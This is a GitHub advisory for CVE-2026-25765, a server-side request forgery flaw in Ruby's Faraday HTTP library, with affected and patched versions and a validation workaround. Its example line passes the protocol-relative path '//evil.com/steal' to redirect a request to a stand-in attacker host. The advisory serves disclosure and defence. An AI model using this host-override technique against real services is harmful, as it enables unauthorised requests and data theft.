CVE-2026-25765 - GitHub Advisory Database (original) (raw)

  1. GitHub Advisory Database
  2. GitHub Reviewed
  3. CVE-2026-25765

Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Moderate severity GitHub Reviewed PublishedFeb 7, 2026 in lostisland/faraday • Updated Feb 12, 2026

Package

Affected versions

>= 2.0.0, <= 2.14.0

>= 1.0.0, <= 1.10.4

Patched versions

2.14.1

1.10.5

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com') conn.get('//evil.com/steal')

Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

Example validation:

def safe_path(user_input) raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]}) user_input end

References

Published to the GitHub Advisory Database

Feb 9, 2026

Last updated

Feb 12, 2026